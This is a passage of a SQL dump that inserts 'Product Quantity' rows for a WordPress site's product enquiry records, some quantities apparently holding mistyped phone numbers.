INSERT INTO `wp_enquiry_meta` VALUES (349, 723, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (350, 724, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (351, 725, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (352, 726, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (353, 727, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (354, 728, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (355, 729, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (356, 730, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (357, 731, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (358, 732, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (359, 733, 'Product Quantity', '1000'); 
INSERT INTO `wp_enquiry_meta` VALUES (360, 734, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (361, 735, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (362, 736, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (363, 737, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (364, 738, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (365, 739, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (366, 740, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (367, 741, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (368, 742, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (369, 743, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (370, 744, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (371, 745, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (372, 746, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (373, 747, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (374, 748, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (375, 749, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (376, 750, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (377, 751, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (378, 752, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (379, 753, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (380, 754, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (381, 755, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (382, 756, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (383, 757, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (384, 758, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (385, 759, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (386, 760, 'Product Quantity', '12'); 
INSERT INTO `wp_enquiry_meta` VALUES (387, 761, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (388, 762, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (389, 763, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (390, 764, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (391, 765, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (392, 766, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (393, 767, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (394, 768, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (395, 769, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (396, 770, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (397, 771, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (398, 772, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (399, 773, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (400, 774, 'Product Quantity', '40'); 
INSERT INTO `wp_enquiry_meta` VALUES (401, 775, 'Product Quantity', '100'); 
INSERT INTO `wp_enquiry_meta` VALUES (402, 776, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (403, 777, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (404, 778, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (405, 779, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (406, 780, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (407, 781, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (408, 782, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (409, 783, 'Product Quantity', '12'); 
INSERT INTO `wp_enquiry_meta` VALUES (410, 784, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (411, 785, 'Product Quantity', '12'); 
INSERT INTO `wp_enquiry_meta` VALUES (412, 786, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (413, 787, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (414, 788, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (415, 789, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (416, 790, 'Product Quantity', '5'); 
INSERT INTO `wp_enquiry_meta` VALUES (417, 791, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (418, 792, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (419, 793, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (420, 794, 'Product Quantity', '17085487499'); 
INSERT INTO `wp_enquiry_meta` VALUES (421, 795, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (422, 796, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (423, 797, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (424, 798, 'Product Quantity', '3'); 
INSERT INTO `wp_enquiry_meta` VALUES (425, 799, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (426, 800, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (427, 801, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (428, 802, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (429, 803, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (430, 804, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (431, 805, 'Product Quantity', '100'); 
INSERT INTO `wp_enquiry_meta` VALUES (432, 806, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (433, 807, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (434, 808, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (435, 809, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (436, 810, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (437, 811, 'Product Quantity', '6'); 
INSERT INTO `wp_enquiry_meta` VALUES (438, 812, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (439, 813, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (440, 814, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (441, 815, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (442, 816, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (443, 817, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (444, 818, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (445, 819, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (446, 820, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (447, 821, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (448, 822, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (449, 823, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (450, 824, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (451, 825, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (452, 826, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (453, 827, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (454, 828, 'Product Quantity', '4'); 
INSERT INTO `wp_enquiry_meta` VALUES (455, 829, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (456, 830, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (457, 831, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (458, 832, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (459, 833, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (460, 834, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (461, 835, 'Product Quantity', '7405551'); 
INSERT INTO `wp_enquiry_meta` VALUES (462, 836, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (463, 837, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (464, 838, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (465, 839, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (466, 840, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (467, 841, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (468, 842, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (469, 843, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (470, 844, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (471, 845, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (472, 846, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (473, 847, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (474, 848, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (475, 849, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (476, 850, 'Product Quantity', '10'); 
INSERT INTO `wp_enquiry_meta` VALUES (477, 851, 'Product Quantity', '12'); 
INSERT INTO `wp_enquiry_meta` VALUES (478, 852, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (479, 853, 'Product Quantity', '107'); 
INSERT INTO `wp_enquiry_meta` VALUES (480, 854, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (481, 855, 'Product Quantity', '12'); 
INSERT INTO `wp_enquiry_meta` VALUES (482, 856, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (483, 857, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (484, 858, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (485, 859, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (486, 860, 'Product Quantity', '5'); 
INSERT INTO `wp_enquiry_meta` VALUES (487, 861, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (488, 862, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (489, 863, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (490, 864, 'Product Quantity', '6'); 
INSERT INTO `wp_enquiry_meta` VALUES (491, 865, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (492, 866, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (493, 867, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (494, 868, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (495, 869, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (496, 870, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (497, 871, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (498, 872, 'Product Quantity', '30'); 
INSERT INTO `wp_enquiry_meta` VALUES (499, 873, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (500, 874, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (501, 875, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (502, 876, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (503, 877, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (504, 878, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (505, 879, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (506, 880, 'Product Quantity', '12'); 
INSERT INTO `wp_enquiry_meta` VALUES (507, 881, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (508, 882, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (509, 883, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (510, 884, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (511, 885, 'Product Quantity', '5'); 
INSERT INTO `wp_enquiry_meta` VALUES (512, 886, 'Product Quantity', '4'); 
INSERT INTO `wp_enquiry_meta` VALUES (513, 887, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (514, 888, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (515, 889, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (516, 890, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (517, 891, 'Product Quantity', '100'); 
INSERT INTO `wp_enquiry_meta` VALUES (518, 892, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (519, 893, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (520, 894, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (521, 895, 'Product Quantity', '5'); 
INSERT INTO `wp_enquiry_meta` VALUES (522, 896, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (523, 897, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (524, 898, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (525, 899, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (526, 900, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (527, 901, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (528, 902, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (529, 903, 'Product Quantity', '100'); 
INSERT INTO `wp_enquiry_meta` VALUES (530, 904, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (531, 905, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (532, 906, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (533, 907, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (534, 908, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (535, 909, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (536, 910, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (537, 911, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (538, 912, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (539, 913, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (540, 914, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (541, 915, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (542, 916, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (543, 917, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (544, 918, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (545, 919, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (546, 920, 'Product Quantity', '24'); 
INSERT INTO `wp_enquiry_meta` VALUES (547, 921, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (548, 922, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (549, 923, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (550, 924, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (551, 925, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (552, 926, 'Product Quantity', '3'); 
INSERT INTO `wp_enquiry_meta` VALUES (553, 927, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (554, 928, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (555, 929, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (556, 930, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (557, 931, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (558, 932, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (559, 933, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (560, 934, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (561, 935, 'Product Quantity', '12'); 
INSERT INTO `wp_enquiry_meta` VALUES (562, 936, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (563, 937, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (564, 938, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (565, 939, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (566, 940, 'Product Quantity', '0'); 
INSERT INTO `wp_enquiry_meta` VALUES (567, 941, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (568, 942, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (569, 943, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (570, 944, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (571, 945, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (572, 946, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (573, 947, 'Product Quantity', '24'); 
INSERT INTO `wp_enquiry_meta` VALUES (574, 948, 'Product Quantity', '24'); 
INSERT INTO `wp_enquiry_meta` VALUES (575, 949, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (576, 950, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (577, 951, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (578, 952, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (579, 953, 'Product Quantity', '12'); 
INSERT INTO `wp_enquiry_meta` VALUES (580, 954, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (581, 955, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (582, 956, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (583, 957, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (584, 958, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (585, 959, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (586, 960, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (587, 961, 'Product Quantity', '9740110576'); 
INSERT INTO `wp_enquiry_meta` VALUES (588, 962, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (589, 963, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (590, 964, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (591, 965, 'Product Quantity', '4'); 
INSERT INTO `wp_enquiry_meta` VALUES (592, 966, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (593, 967, 'Product Quantity', '4'); 
INSERT INTO `wp_enquiry_meta` VALUES (594, 968, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (595, 969, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (596, 970, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (597, 971, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (598, 972, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (599, 973, 'Product Quantity', '50'); 
INSERT INTO `wp_enquiry_meta` VALUES (600, 974, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (601, 975, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (602, 976, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (603, 977, 'Product Quantity', '100'); 
INSERT INTO `wp_enquiry_meta` VALUES (604, 978, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (605, 979, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (606, 980, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (607, 981, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (608, 982, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (609, 983, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (610, 984, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (611, 985, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (612, 986, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (613, 987, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (614, 988, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (615, 989, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (616, 990, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (617, 991, 'Product Quantity', '24'); 
INSERT INTO `wp_enquiry_meta` VALUES (618, 992, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (619, 993, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (620, 994, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (621, 995, 'Product Quantity', '5'); 
INSERT INTO `wp_enquiry_meta` VALUES (622, 996, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (623, 997, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (624, 998, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (625, 999, 'Product Quantity', '3'); 
INSERT INTO `wp_enquiry_meta` VALUES (626, 1000, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (627, 1001, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (628, 1002, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (629, 1003, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (630, 1004, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (631, 1005, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (632, 1006, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (633, 1007, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (634, 1008, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (635, 1009, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (636, 1010, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (637, 1011, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (638, 1012, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (639, 1013, 'Product Quantity', '7'); 
INSERT INTO `wp_enquiry_meta` VALUES (640, 1014, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (641, 1015, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (642, 1016, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (643, 1017, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (644, 1018, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (645, 1019, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (646, 1020, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (647, 1021, 'Product Quantity', '3'); 
INSERT INTO `wp_enquiry_meta` VALUES (648, 1022, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (649, 1023, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (650, 1024, 'Product Quantity', '5'); 
INSERT INTO `wp_enquiry_meta` VALUES (651, 1025, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (652, 1026, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (653, 1027, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (654, 1028, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (655, 1029, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (656, 1030, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (657, 1031, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (658, 1032, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (659, 1033, 'Product Quantity', '4'); 
INSERT INTO `wp_enquiry_meta` VALUES (660, 1034, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (661, 1035, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (662, 1036, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (663, 1037, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (664, 1038, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (665, 1039, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (666, 1040, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (667, 1041, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (668, 1042, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (669, 1043, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (670, 1044, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (671, 1045, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (672, 1046, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (673, 1047, 'Product Quantity', '4'); 
INSERT INTO `wp_enquiry_meta` VALUES (674, 1048, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (675, 1049, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (676, 1050, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (677, 1051, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (678, 1052, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (679, 1053, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (680, 1054, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (681, 1055, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (682, 1056, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (683, 1057, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (684, 1058, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (685, 1059, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (686, 1060, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (687, 1061, 'Product Quantity', '1'); 
